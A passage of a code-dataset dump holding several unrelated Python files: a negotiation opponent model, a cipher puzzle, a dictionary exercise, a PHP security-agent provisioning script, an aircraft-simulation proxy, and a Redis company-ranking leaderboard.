range(len(offer)):\n value = offer[i]\n loc_value = self.issue_value_num_flatten[i][value]\n offer_onehot[loc_value] = 1\n return offer_onehot\n \n def __call__(self, offer):\n offer_onehot = self.offer_2_onehot(offer)\n util = (self.accume_ufun * offer_onehot).sum(axis = 0)\n return util\n\n def update_time_sequence(self):\n t_i = self.times_i / self.time_max\n self.time_sequence_origin = np.append(self.time_sequence_origin, t_i)\n self.times_i = self.times_i + 1\n\n def first_update_time_sequence(self):\n t_i = self.times_i / self.time_max\n self.time_sequence_origin = np.array([t_i])\n self.times_i = self.times_i + 1\n \n def update_accumed_ufun(self):\n evaluations = self.evaluations.accume\n flatten_weights = self.flatten_weights_HS(self.weights.accume.reshape([1,-1])).reshape([-1])\n self.accume_ufun = flatten_weights * evaluations\n \n @likelihood_none_zero\n def _first_likelihood_func(self, ufuns):\n sigma = self.SIGMA\n first_bid = self.onehot_bids_history[0, :]\n estimated_utilities = (ufuns * first_bid).sum(axis = 1)\n delta = estimated_utilities - 1\n delta[np.where(delta >= 0)] = 0\n likelihood = (1 / (sigma * np.sqrt(2 * np.pi))) * np.exp(-(delta * delta) / (2 * sigma * sigma))\n return likelihood\n\n\n\nclass Specific_OM(Meta_OM):\n\n @likelihood_none_zero\n def _likelihood_func(self, ufuns):\n bids_till_now = self.onehot_bids_history\n time = self.time_sequence_origin[-1]\n u_T = 1 - 0.1 * time\n newest_bid = bids_till_now[-1, :]\n u_H = (ufuns * newest_bid).sum(axis = 1)\n sigma = self.SIGMA\n delta = u_H - u_T\n likelihood = 1 / (self.SIGMA * np.sqrt(2*np.pi)) * np.exp(-(delta ** 2) / (2 * sigma * sigma))\n\n return likelihood\n \n","repo_name":"Shengbo-Chang/supplementary-for-COMB","sub_path":"model_codes/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":14950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32123557247","text":"a,b=map(int,input().split())\nt=input()\narr=[]\n\nfor i in t:\n num=(ord(i)-ord('a'))\n arr.append(num)\nanswer=[]\nalpha=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\n\nfor i in arr:\n cnt=1\n\n while ((26*cnt+i-b)%a) !=0:\n cnt+=1\n ans= ((26 * cnt + i - b) // a)% 26\n answer.append(ans)\n\nfor i in answer:\n print(alpha[i],end='')\n","repo_name":"imdduoming/hitalgor","sub_path":"Codingtest/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74506897544","text":"# x = [ [5,2,3], [10,8,9] ] \n# x[1][0]=15\n# print(x)\n\n# students = [\n# {'first_name': 'Michael', 'last_name' : 'Jordan'},\n# {'first_name' : 'John', 'last_name' : 'Rosales'}\n# ]\n# students[0]['last_name']='Bryant'\n# print(students)\n\n# sports_directory = {\n# 'basketball' : ['Kobe', 'Jordan', 'James', 'Curry'],\n# 'soccer' : ['Messi', 'Ronaldo', 'Rooney']\n# }\n\n\n# sports_directory['soccer'][0]='Andres'\n# print(sports_directory)\n\n\n# students = [\n# {'first_name': 'Michael', 'last_name' : 'Jordan'},\n# {'first_name' : 'John', 'last_name' : 'Rosales'},\n# {'first_name' : 'Mark', 'last_name' : 'Guillen'},\n# {'first_name' : 'KB', 'last_name' : 'Tonel'}\n# ]\n# def iterateDictionary(students):\n \n# for i in students:\n \n# print(i)\n\n\n##iterateDictionary(students)\n\n# def iterateDictionary2(key_name, dic):\n# for i in dic:\n \n# print(i[key_name])\n\n\n\n# iterateDictionary2('first_name', students)\n# iterateDictionary2('last_name', students)\n\ndojo = {\n 'locations': ['San Jose', 'Seattle', 'Dallas', 'Chicago', 'Tulsa', 'DC', 'Burbank'],\n 'instructors': ['Michael', 'Amy', 'Eduardo', 'Josh', 'Graham', 'Patrick', 'Minh', 'Devon']\n}\n\ndef printInfo(dict):\n for key in dict:\n print(len(dict[key]),key.upper())\n for val in dict[key]:\n print(val)\n\n\nprintInfo(dojo)\n\n","repo_name":"AlaaMansourn/python_stack","sub_path":"_python/python_fundementals/intermediate_function2.py","file_name":"intermediate_function2.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1155416444","text":"import sys\r\nimport subprocess\r\nimport os\r\nimport shutil\r\nimport re\r\nimport logging\r\nimport autoprov.ProcessUtil as ProcessUtil\r\nimport autoprov.autoprov as autoprov\r\nimport json\r\n\r\ndocRoot = webServer = phpVersion = phpConfigFolder = \"\"\r\n\r\nPHP_IAE_DIR = \"iae-php\"\r\nVSP_INI_FILE = \"vsp.ini\"\r\nVSP_OPT_FOLDER = \"/opt/virsec\"\r\n\r\nclass Php:\r\n def __init__(self, *args): # pkgName, configDir, phpVersion):\r\n if (len(args) == 3):\r\n self.__pkgName = args[0]\r\n self.__configDir = args[1]\r\n self.__version = args[2]\r\n self.__zts = False\r\n\r\n if (len(args) == 1):\r\n self.__phpPath = args[0]\r\n self.__phpInfo = None\r\n self.InitPhpInfo()\r\n self.InitMetadata()\r\n\r\n def InitMetadata(self):\r\n self.__version = self.FindValue(\"^PHP Version => (.+)$\")\r\n self.__configDir = self.FindValue('^Scan this dir for additional .ini files => (.+)$')\r\n self.__zts = self.FindValue('^Thread Safety => (.+)$') == \"enabled\"\r\n\r\n\r\n def InitPhpInfo(self):\r\n cmd = [self.__phpPath, \"-d\", \"virseciae.disable=1\", \"-i\"] \r\n try:\r\n self.__phpInfo = ProcessUtil.execute(cmd, stderr=open(os.devnull, 'w+')).decode('latin-1')\r\n except subprocess.CalledProcessError as e:\r\n logging.debug(\"Error executing %s : %s\" % (\" \".join(cmd), e))\r\n\r\n def FindValue(self, regx, group=1):\r\n if not self.__phpInfo:\r\n return \"\"\r\n\r\n info = self.__phpInfo\r\n if info:\r\n matches = re.search(regx, info, flags=re.M)\r\n if matches:\r\n res = matches.group(group)\r\n if res != '(none)':\r\n return res\r\n\r\n return \"\"\r\n\r\n def major(self):\r\n if self.__version:\r\n return int(self.__version.split('.')[0])\r\n\r\n def minor(self):\r\n if self.__version:\r\n return int(self.__version.split('.')[1])\r\n\r\n def patch(self):\r\n if self.__version:\r\n return int(self.__version.split('.')[2])\r\n\r\n def Version(self):\r\n if self.__version:\r\n return \"%d.%d\" % (self.major(), self.minor())\r\n else:\r\n return \"\"\r\n\r\n def ConfigFolder(self):\r\n return self.__configDir\r\n\r\n def IsZts(self):\r\n return self.__zts\r\n\r\nclass PhpDebianPackages:\r\n DebianPackageCmd = '/usr/bin/dpkg'\r\n DebianPackageQuery = '/usr/bin/dpkg-query'\r\n Packages = {\r\n 'libapache2-mod-php5.6': {\r\n '_extension_dir': '/usr/lib/php/20131226',\r\n '_configuration_dir': '/etc/php/5.6/apache2/conf.d'\r\n },\r\n 'libapache2-mod-php5': {\r\n '_extension_dir': '/usr/lib/php5/20131226',\r\n '_configuration_dir': '/etc/php5/apache2/conf.d'\r\n },\r\n 'libapache2-mod-php7.0': {\r\n '_extension_dir': '/usr/lib/php/20151012',\r\n '_configuration_dir': '/etc/php/7.0/apache2/conf.d'\r\n },\r\n 'libapache2-mod-php7.1': {\r\n '_extension_dir': '/usr/lib/php/20160303',\r\n '_configuration_dir': '/etc/php/7.1/apache2/conf.d'\r\n },\r\n 'libapache2-mod-php7.2': {\r\n '_extension_dir': '/usr/lib/php/20170718',\r\n '_configuration_dir': '/etc/php/7.2/apache2/conf.d'\r\n },\r\n 'libapache2-mod-php7.3': {\r\n '_extension_dir': '/usr/lib/php/20180731',\r\n '_configuration_dir': '/etc/php/7.3/apache2/conf.d'\r\n },\r\n 'libapache2-mod-php7.4': {\r\n '_extension_dir': '/usr/lib/php/20190902',\r\n '_configuration_dir': '/etc/php/7.4/apache2/conf.d'\r\n },\r\n 'libapache2-mod-php8.0': {\r\n '_extension_dir': '/usr/lib/php/20200930',\r\n '_configuration_dir': '/etc/php/8.0/apache2/conf.d'\r\n },\r\n 'php5-cgi': {\r\n '_extension_dir': '/usr/lib/php5/20131226',\r\n '_configuration_dir': '/etc/php5/cgi/conf.d'\r\n },\r\n 'php7.0-cgi': {\r\n '_extension_dir': '/usr/lib/php/20151012',\r\n '_configuration_dir': '/etc/php/7.0/cgi/conf.d'\r\n },\r\n 'php7.1-cgi': {\r\n '_extension_dir': '/usr/lib/php/20160303',\r\n '_configuration_dir': '/etc/php/7.1/cgi/conf.d'\r\n },\r\n 'php7.2-cgi': {\r\n '_extension_dir': '/usr/lib/php/20170718',\r\n '_configuration_dir': '/etc/php/7.2/cgi/conf.d'\r\n },\r\n 'php7.3-cgi': {\r\n '_extension_dir': '/usr/lib/php/20180731',\r\n '_configuration_dir': '/etc/php/7.3/cgi/conf.d'\r\n },\r\n 'php7.4-cgi': {\r\n '_extension_dir': '/usr/lib/php/20190902',\r\n '_configuration_dir': '/etc/php/7.4/cgi/conf.d'\r\n },\r\n 'php8.0-cgi': {\r\n '_extension_dir': '/usr/lib/php/20200930',\r\n '_configuration_dir': '/etc/php/8.0/cgi/conf.d'\r\n },\r\n }\r\n\r\n def InstalledPackages(self):\r\n instldPackages = []\r\n\r\n if not os.path.exists(self.DebianPackageQuery):\r\n return instldPackages\r\n\r\n cmd = [self.DebianPackageQuery, '-W', '-f', '${binary:Package} ${Version}\\n']\r\n try:\r\n outputs = ProcessUtil.execute(cmd, stderr=open(os.devnull, 'w+')).decode('latin-1').split(\"\\n\")\r\n\r\n #logging.debug(\"CMD - %s, Output: %s\" % (cmd, outputs))\r\n\r\n outputs.pop()\r\n for line in outputs:\r\n items = line.split(\" \")\r\n instldPackages.append([items[0], items[1].split('-')[0]])\r\n\r\n except subprocess.CalledProcessError as e:\r\n logging.debug(\"Command invocation error %s : %s\" % (\" \".join(cmd), e))\r\n\r\n return instldPackages\r\n\r\n def InstalledPhpPackages(self, reqVer):\r\n phpPckgs = []\r\n pckgs = self.InstalledPackages()\r\n for pckg in pckgs:\r\n if pckg[0] in self.Packages:\r\n fndPckg = self.Packages[pckg[0]]\r\n phpPckg = Php(pckg[0], fndPckg[\"_configuration_dir\"], pckg[1]) \r\n if phpPckg.Version() == reqVer:\r\n phpPckgs.append(phpPckg)\r\n \r\n return phpPckgs\r\n\r\nclass PhpKnownLocation:\r\n KnownFolders = [\r\n '/usr/php/bin',\r\n '/usr/php-7.0/bin',\r\n '/usr/php-7.1/bin',\r\n '/usr/php-7.2/bin',\r\n '/usr/php-7.3/bin',\r\n '/usr/php-7.4/bin',\r\n '/usr/php-8.0/bin',\r\n '/usr/php/7.0/bin',\r\n '/usr/php/7.1/bin',\r\n '/usr/php/7.2/bin',\r\n '/usr/php/7.3/bin',\r\n '/usr/php/7.4/bin',\r\n '/usr/php/8.0/bin',\r\n\r\n '/usr/local/bin',\r\n '/usr/local/php/bin',\r\n '/usr/local/zend/bin',\r\n '/usr/local/php-7.0/bin',\r\n '/usr/local/php-7.1/bin',\r\n '/usr/local/php-7.2/bin',\r\n '/usr/local/php-7.3/bin',\r\n '/usr/local/php-7.4/bin',\r\n '/usr/local/php-8.0/bin',\r\n\r\n '/opt/local/bin',\r\n '/opt/php/bin',\r\n '/opt/zend/bin',\r\n '/opt/php-7.0/bin',\r\n '/opt/php-7.1/bin',\r\n '/opt/php-7.2/bin',\r\n '/opt/php-7.3/bin',\r\n '/opt/php-7.4/bin',\r\n '/opt/php-8.0/bin',\r\n\r\n '/opt/cpanel/ea-php53/root/usr/bin',\r\n '/opt/cpanel/ea-php54/root/usr/bin',\r\n '/opt/cpanel/ea-php55/root/usr/bin',\r\n '/opt/cpanel/ea-php56/root/usr/bin',\r\n '/opt/cpanel/ea-php70/root/usr/bin',\r\n '/opt/cpanel/ea-php71/root/usr/bin',\r\n '/opt/cpanel/ea-php72/root/usr/bin',\r\n '/opt/cpanel/ea-php73/root/usr/bin',\r\n '/opt/cpanel/ea-php74/root/usr/bin',\r\n '/opt/cpanel/ea-php80/root/usr/bin',\r\n\r\n '/opt/cpanel/php/root/usr/bin',\r\n '/opt/cpanel/php/usr/bin',\r\n '/opt/cpanel/php/bin',\r\n\r\n '/RunCloud/Packages/php56rc/bin',\r\n '/RunCloud/Packages/php70rc/bin',\r\n '/RunCloud/Packages/php71rc/bin',\r\n '/RunCloud/Packages/php72rc/bin',\r\n '/RunCloud/Packages/php73rc/bin',\r\n '/RunCloud/Packages/php74rc/bin',\r\n '/RunCloud/Packages/php80rc/bin',\r\n\r\n '/opt/bitnami/php/bin',\r\n '/opt/bitnami/php-7.0/bin',\r\n '/opt/bitnami/php-7.1/bin',\r\n '/opt/bitnami/php-7.2/bin',\r\n '/opt/bitnami/php-7.3/bin',\r\n '/opt/bitnami/php-7.4/bin',\r\n '/opt/bitnami/php-8.0/bin',\r\n '/opt/bitnami/php/7.0/bin',\r\n '/opt/bitnami/php/7.1/bin',\r\n '/opt/bitnami/php/7.2/bin',\r\n '/opt/bitnami/php/7.3/bin',\r\n '/opt/bitnami/php/7.4/bin',\r\n '/opt/bitnami/php/8.0/bin',\r\n ]\r\n\r\n def InstalledPhps(self, reqVer):\r\n folders = os.environ.get('PATH', '').split(':') + self.__class__.KnownFolders\r\n folders = list(set(folders))\r\n insldPhp = []\r\n for fldr in folders:\r\n fndPhps = self.CheckPhp(fldr)\r\n if fndPhps:\r\n for foundPhp in fndPhps:\r\n if foundPhp.Version() == reqVer:\r\n insldPhp.append(foundPhp)\r\n\r\n return insldPhp\r\n\r\n def CheckPhp(self, fldr):\r\n phps = []\r\n if os.path.isdir(fldr):\r\n for name in os.listdir(fldr):\r\n if re.match('(zts-)?php([57])?(-fpm)?(-?\\d(\\.?\\d+)?)?$', name):\r\n file_path = os.path.join(fldr, name)\r\n with open(file_path, 'rb') as fd:\r\n if fd.read(4) != b\"\\x7fELF\":\r\n continue\r\n phps.append(Php(file_path))\r\n\r\n return phps\r\n\r\ndef validateArgs(docRoot):\r\n if not os.path.isdir(docRoot):\r\n return False\r\n return True\r\n \r\n\r\ndef provPhp(action, docRoot, webServer, phpVersion, phpConfigFolder, appContextPath, refCount:int):\r\n status = validateArgs(docRoot)\r\n if status is False:\r\n error = \"Doc %s root is not present\" % docRoot\r\n logging.critical(error)\r\n return False\r\n\r\n logging.debug(\"PHP application - action %s docRoot %s,\"\r\n \"webServer %s, phpVersion %s, phpConfigFolder %s, appContextPath %s, refCount %s\"\r\n % (action, docRoot, webServer, phpVersion, phpConfigFolder, appContextPath, refCount))\r\n\r\n# Action: Cleanup -> refcount is not ZERO\r\n if action == \"clean\":\r\n if refCount > 1:\r\n removeAppFiles(docRoot)\r\n return True\r\n\r\n vspIniFilePath = os.path.join(VSP_OPT_FOLDER, PHP_IAE_DIR, phpVersion, VSP_INI_FILE)\r\n if not os.path.isfile(vspIniFilePath):\r\n error = \"File not found - %s\" % vspIniFilePath\r\n logging.critical(error)\r\n return False\r\n\r\n knownPhps = PhpKnownLocation().InstalledPhps(phpVersion)\r\n instldPhpPackgs = PhpDebianPackages().InstalledPhpPackages(phpVersion)\r\n\r\n instldPhps = list()\r\n\r\n if (phpConfigFolder and not phpConfigFolder.isspace()):\r\n if os.path.isdir(phpConfigFolder):\r\n instldPhps.append(Php(\"custom\", phpConfigFolder, phpVersion))\r\n else:\r\n error = \"Configured PHP coniguration folder %s does not exist\" % phpConfigFolder\r\n logging.critical(error)\r\n return False\r\n else:\r\n if (knownPhps):\r\n instldPhps.extend(knownPhps)\r\n if (instldPhpPackgs):\r\n instldPhps.extend(instldPhpPackgs)\r\n\r\n logging.debug(\"Installed packages - %d - %s\" % (len(instldPhps), instldPhps))\r\n\r\n if len(instldPhps) == 0:\r\n error = \"No Installed packages found check if php %s is installed\" % phpVersion\r\n logging.warning(error)\r\n return False\r\n\r\n provisionedPhp = list()\r\n for ipcg in instldPhps:\r\n logging.debug(\"PHP Config folder %s\" % (ipcg.ConfigFolder()))\r\n\r\n if ipcg.ConfigFolder() in provisionedPhp or ipcg.IsZts():\r\n continue\r\n\r\n targetIniPath = os.path.join(ipcg.ConfigFolder(), \"vsp.ini\")\r\n\r\n provisionedPhp.append(ipcg.ConfigFolder())\r\n\r\n# Action: Provision\r\n if action == \"prov\":\r\n logging.debug(\"Copying file %s to %s\" % (vspIniFilePath, targetIniPath))\r\n shutil.copyfile(vspIniFilePath, targetIniPath)\r\n os.chmod(targetIniPath, 0o644)\r\n virsecIae = os.path.join(docRoot, \"VirsecIae.config\")\r\n virsecResource = os.path.join(docRoot, \"virsecresources.php\")\r\n if(os.path.isfile(virsecIae)):\r\n os.remove(targetIniPath)\r\n logging.debug(\"file already present %s , removed %s \" %( virsecIae, virsecIae))\r\n with open(os.path.join(docRoot, \"VirsecIae.config\"), 'w') as vcfg:\r\n dictionary:dict = dict()\r\n dictionary[\"LogPath\"] = \"/var/virsec/log\"\r\n dictionary[\"LogLevel\"] = \"Info\"\r\n dictionary[\"AppCtx\"] = appContextPath\r\n json_object = json.dumps(dictionary, indent = 4)\r\n vcfg.write(json_object)\r\n logging.debug(\"saved file contents are %s \" % json_object)\r\n os.chmod(os.path.join(docRoot, \"VirsecIae.config\"), 0o755)\r\n logging.debug(\"Success: created file %s\" % virsecIae)\r\n vcfg.close()\r\n\r\n if(os.path.isfile(virsecResource)):\r\n os.remove(virsecResource)\r\n logging.debug(\"file already present %s , removed %s \" %( virsecResource, virsecResource))\r\n with open(virsecResource, 'w') as vcfg:\r\n os.chmod(virsecResource, 0o755)\r\n logging.debug(\"Success: created file %s\" % virsecResource)\r\n vcfg.close()\r\n ProcessUtil.selinuxLoadAndCompilePolicyModule(action)\r\n #ProcessUtil.restartPhp(webServer, phpVersion)\r\n\r\n# Action: Cleanup -> refcount is 1 i.e last \r\n elif action == \"clean\":\r\n if refCount <= 1:\r\n logging.debug(\"Trying to remove file %s\" % targetIniPath)\r\n if os.path.isfile(targetIniPath):\r\n os.remove(targetIniPath)\r\n logging.debug(\"Success: removed file %s\" % targetIniPath)\r\n else:\r\n logging.debug(\"File not found %s\" % targetIniPath)\r\n ProcessUtil.selinuxLoadAndCompilePolicyModule(action)\r\n #ProcessUtil.restartPhp(webServer, phpVersion)\r\n removeAppFiles(docRoot)\r\n return True\r\n\r\ndef removeAppFiles(docRoot):\r\n virsecIae = os.path.join(docRoot, \"VirsecIae.config\")\r\n virsecResource = os.path.join(docRoot, \"virsecresources.php\")\r\n if (os.path.isfile(virsecIae)):\r\n logging.debug(\"Removing file %s\" % (os.path.join(docRoot, \"VirsecIae.config\")))\r\n os.remove(os.path.join(docRoot, \"VirsecIae.config\")) \r\n logging.debug(\"Success: removed file %s\" % virsecIae)\r\n \r\n if (os.path.isfile(virsecResource)):\r\n logging.debug(\"Removing file %s\" % (os.path.join(docRoot, \"virsecresources.php\")))\r\n os.remove(os.path.join(docRoot, \"virsecresources.php\"))\r\n logging.debug(\"Success: removed file %s\" % virsecResource)\r\n","repo_name":"arymangupta/python_utils","sub_path":"provphp.py","file_name":"provphp.py","file_ext":"py","file_size_in_byte":14846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29899319990","text":"\"\"\"\nContains the ProxyAircraftControls class\n\"\"\"\nimport copy\nimport logging\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\nfrom typing import Tuple\nfrom typing import Union\n\nfrom aviary.sector.route import Route\nfrom aviary.sector.sector_element import SectorElement\n\nimport bluebird.utils.types as types\nfrom bluebird.utils.abstract_aircraft_controls import AbstractAircraftControls\nfrom bluebird.utils.properties import AircraftProperties\n\n\nclass ProxyAircraftControls(AbstractAircraftControls):\n \"\"\"Proxy implementation of AbstractAircraftControls\"\"\"\n\n @property\n def all_properties(self) -> Union[Dict[types.Callsign, AircraftProperties], str]:\n self._logger.debug(\"all_properties: Accessed\")\n if self._data_valid:\n self._logger.debug(\"all_properties: Using cache\")\n return self._ac_props\n all_props = self._aircraft_controls.all_properties\n if not isinstance(all_props, dict):\n return all_props\n for callsign in list(self._ac_props):\n if callsign not in all_props:\n self._logger.warning(\n f\"all_properties: Aircraft {callsign} has \"\n \"been removed from the simulation\"\n )\n self._ac_props.pop(callsign, None)\n continue\n self._update_ac_properties(callsign, all_props[callsign])\n self._logger.debug(\"all_properties: Data now valid\")\n self._data_valid = True\n return self._ac_props\n\n @property\n def callsigns(self) -> Union[List[types.Callsign], str]:\n if not self._data_valid:\n err = self.all_properties\n if isinstance(err, str):\n return err\n return list(self._ac_props.keys())\n\n def __init__(self, aircraft_controls: AbstractAircraftControls):\n self._logger = logging.getLogger(__name__)\n self._aircraft_controls = aircraft_controls\n\n self._ac_props: Dict[types.Callsign, Optional[AircraftProperties]] = {}\n self._prev_ac_props: Dict[types.Callsign, Optional[AircraftProperties]] = {}\n self._routes: Dict[str, Route] = {}\n self._data_valid: bool = False\n\n def set_cleared_fl(\n self, callsign: types.Callsign, flight_level: types.Altitude, **kwargs\n ) -> Optional[str]:\n err = self._aircraft_controls.set_cleared_fl(callsign, flight_level, **kwargs)\n if err:\n return err\n self._ac_props[callsign].cleared_flight_level = flight_level\n return None\n\n def set_heading(\n self, callsign: types.Callsign, heading: types.Heading\n ) -> Optional[str]:\n return self._aircraft_controls.set_heading(callsign, heading)\n\n def set_ground_speed(\n self, callsign: types.Callsign, ground_speed: types.GroundSpeed\n ) -> Optional[str]:\n return self._aircraft_controls.set_ground_speed(callsign, ground_speed)\n\n def set_vertical_speed(\n self, callsign: types.Callsign, vertical_speed: types.VerticalSpeed\n ) -> Optional[str]:\n return self._aircraft_controls.set_vertical_speed(callsign, vertical_speed)\n\n def direct_to_waypoint(\n self, callsign: types.Callsign, waypoint: str\n ) -> Optional[str]:\n props = self.properties(callsign)\n if not isinstance(props, AircraftProperties):\n return props\n if not props.route_name:\n return \"Aircraft has no route\"\n route_waypoints = [x[0] for x in self._routes[props.route_name].fix_list]\n if waypoint not in route_waypoints:\n return f'Waypoint \"{waypoint}\" is not in the route {route_waypoints}'\n return self._aircraft_controls.direct_to_waypoint(callsign, waypoint)\n\n def create(\n self,\n callsign: types.Callsign,\n ac_type: str,\n position: types.LatLon,\n heading: types.Heading,\n altitude: types.Altitude,\n gspd: types.GroundSpeed,\n ) -> Optional[str]:\n # NOTE(RKM 2019-11-20) Creating an aircraft with a specified route is currently\n # not implemented\n exists = self.exists(callsign)\n if not isinstance(exists, bool):\n return exists\n if self.exists(callsign):\n return \"Aircraft already exists\"\n err = self._aircraft_controls.create(\n callsign, ac_type, position, heading, altitude, gspd\n )\n if err:\n return err\n # Create an empty entry for the new aircraft and ensure we get new data back\n self._ac_props[callsign] = None\n self._data_valid = False\n all_properties = self.all_properties\n if not isinstance(all_properties, dict):\n return all_properties\n return (\n None if callsign in all_properties else \"New callsign missing from sim data\"\n )\n\n def exists(self, callsign: types.Callsign) -> Union[bool, str]:\n all_callsings = self.callsigns\n return (\n bool(callsign in all_callsings)\n if isinstance(all_callsings, list)\n else all_callsings\n )\n\n def properties(self, callsign: types.Callsign) -> Union[AircraftProperties, str]:\n \"\"\"Utility function to return only the properties for the specified aircraft\"\"\"\n all_props = self.all_properties\n if not isinstance(all_props, dict):\n return all_props\n return all_props.get(callsign, None) or f\"Unknown callsign {callsign}\"\n\n def route(self, callsign: types.Callsign) -> Union[Tuple[str, str, List[str]], str]:\n \"\"\"Utility function to return only the route for the specified aircraft\"\"\"\n props = self.properties(callsign)\n if not isinstance(props, AircraftProperties):\n return props\n if not props.route_name:\n return \"Aircraft has no route\"\n\n route = self._routes[props.route_name]\n next_waypoint = route.next_waypoint(\n props.position.lat_degrees, props.position.lon_degrees\n )\n return (props.route_name, next_waypoint, [x[0] for x in route.fix_list])\n\n def invalidate_data(self, clear: bool = False) -> None:\n \"\"\"Clears the data_valid flag\"\"\"\n if clear:\n self._ac_props = {}\n self._prev_ac_props = {}\n self._data_valid = False\n\n def store_current_props(self):\n # TODO(rkm 2020-01-12) In sandbox mode, this needs to be hooked-up to a timer\n # which stores the current state every n seconds\n self._prev_ac_props = copy.deepcopy(self._ac_props)\n\n def prev_ac_props(self) -> Dict[types.Callsign, Optional[AircraftProperties]]:\n # NOTE(rkm 2020-01-29) Defensive copy\n return copy.deepcopy(self._prev_ac_props)\n\n def set_initial_properties(\n self, sector_element: SectorElement, scenario_content: dict\n ) -> None:\n \"\"\"\n Set any properties which are not tracked by the simulator - i.e. the flight\n levels, routes, and aircraft types\n \"\"\"\n\n for route in sector_element.routes():\n self._routes[route.name] = route\n\n new_props: Dict[types.Callsign, AircraftProperties] = {}\n for aircraft in scenario_content[\"aircraft\"]:\n callsign = types.Callsign(aircraft[\"callsign\"])\n new_props[callsign] = AircraftProperties.from_data(aircraft)\n if \"route\" not in aircraft:\n new_props[callsign].route_name = None\n continue\n # Match the route name to the waypoints in the scenario data\n aircraft_route_waypoints = [x[\"fixName\"] for x in aircraft[\"route\"]]\n new_props[callsign].route_name = next(\n x\n for x in self._routes\n if self._routes[x].fix_names() == aircraft_route_waypoints\n )\n\n self._ac_props = new_props\n self._data_valid = False\n\n def _update_ac_properties(\n self, callsign: types.Callsign, new_props: AircraftProperties\n ):\n \"\"\"Updates the stored AircraftProperties with new data from the simulator\"\"\"\n # NOTE(rkm 2020-01-12) If we don't have any existing properties, then that means\n # this is an aircraft that has been created after the scenario has been started.\n # We therefore (currently) don't have any route or req. flight level information\n if not self._ac_props[callsign]:\n self._ac_props[callsign] = new_props\n else:\n props = self._ac_props[callsign]\n props.altitude = new_props.altitude\n props.ground_speed = new_props.ground_speed\n props.heading = new_props.heading\n props.position = new_props.position\n props.vertical_speed = new_props.vertical_speed\n","repo_name":"project-bluebird/bluebird","sub_path":"bluebird/sim_proxy/proxy_aircraft_controls.py","file_name":"proxy_aircraft_controls.py","file_ext":"py","file_size_in_byte":8742,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"81"} +{"seq_id":"74279247306","text":"import os\nimport json\nimport enum\nimport logging\n\nfrom django.conf import settings\nfrom redis import Redis, RedisError, ConnectionError\n\nlogger = logging.getLogger(__name__)\n\nclass RankSortKeys(enum.Enum):\n ALL = 'all'\n TOP10 = 'top10'\n BOTTOM10 = 'bottom10'\n\n\nclass RedisClient:\n def __init__(self):\n try:\n if settings.REDIS_URL:\n self.redis_client = Redis.from_url(\n url=settings.REDIS_URL,\n decode_responses=True\n )\n else:\n self.redis_client = Redis(\n host=settings.REDIS_HOST,\n port=settings.REDIS_PORT,\n password=settings.REDIS_PASSWORD,\n db=settings.REDIS_DB,\n decode_responses=True\n )\n except RedisError:\n logger.error(f'Redis failed connection to {settings.REDIS_HOST}:{settings.REDIS_PORT}.')\n return\n\n def set_init_data(self):\n with open(os.path.join(settings.BASE_DIR, 'companies_data.json'), 'r') as init_data:\n companies = json.load(init_data)\n try:\n for company in companies:\n symbol = self.add_prefix_to_symbol(settings.REDIS_PREFIX, company.get('symbol').lower())\n self.redis_client.zadd(\n settings.REDIS_LEADERBOARD,\n {\n symbol: company.get('marketCap')\n }\n )\n\n self.redis_client.hset(\n symbol,\n 'company',\n company.get('company')\n )\n self.redis_client.hset(\n symbol,\n 'country',\n company.get('country')\n )\n except ConnectionError:\n if settings.REDIS_URL:\n error_message = f'Redis connection time out to {settings.REDIS_URL}.'\n else:\n error_message = f'Redis connection time out to {settings.REDIS_HOST}:{settings.REDIS_PORT}.'\n logger.error(error_message)\n return\n\n @staticmethod\n def add_prefix_to_symbol(prefix, symbol):\n return f\"{prefix}:{symbol}\"\n\n @staticmethod\n def remove_prefix_to_symbol(prefix, symbol):\n return symbol.replace(f'{prefix}:', '')\n\n\nclass CompaniesRanks(RedisClient):\n def update_company_market_capitalization(self, amount, symbol):\n self.redis_client.zincrby(settings.REDIS_LEADERBOARD, amount, self.add_prefix_to_symbol(settings.REDIS_PREFIX, symbol))\n\n def get_ranks_by_sort_key(self, key):\n sort_key = RankSortKeys(key)\n\n if sort_key is RankSortKeys.ALL:\n return self.get_zrange(0, -1)\n elif sort_key is RankSortKeys.TOP10:\n return self.get_zrange(0, 9)\n elif sort_key is RankSortKeys.BOTTOM10:\n return self.get_zrange(0, 9, False)\n \n def get_ranks_by_symbols(self, symbols):\n companies_capitalization = [\n self.redis_client.zscore(settings.REDIS_LEADERBOARD, self.add_prefix_to_symbol(settings.REDIS_PREFIX, symbol))\n for symbol in symbols\n ]\n companies = []\n\n for index, market_capitalization in enumerate(companies_capitalization):\n companies.append([\n self.add_prefix_to_symbol(settings.REDIS_PREFIX, symbols[index]),\n market_capitalization\n ])\n\n return self.get_result(companies)\n\n def get_zrange(self, start_index, stop_index, desc=True):\n query_args = {\n 'name': settings.REDIS_LEADERBOARD,\n 'start': start_index,\n 'end': stop_index,\n 'withscores': True,\n 'score_cast_func': str,\n }\n\n if desc:\n companies = self.redis_client.zrevrange(**query_args)\n else:\n companies = self.redis_client.zrange(**query_args)\n\n return self.get_result(companies, start_index, desc)\n\n def get_result(self, companies, start_index=0, desc=True):\n start_rank = int(start_index) + 1 if desc else (len(companies) - start_index)\n increase_factor = 1 if desc else -1\n results = []\n\n for company in companies:\n symbol = company[0]\n market_cap = company[1]\n company_info = self.redis_client.hgetall(symbol)\n results.append(\n {\n 'company': company_info['company'],\n 'country': company_info['country'],\n 'marketCap': market_cap,\n 'rank': start_rank,\n 'symbol': self.remove_prefix_to_symbol(settings.REDIS_PREFIX, symbol)\n }\n )\n start_rank += increase_factor\n\n return 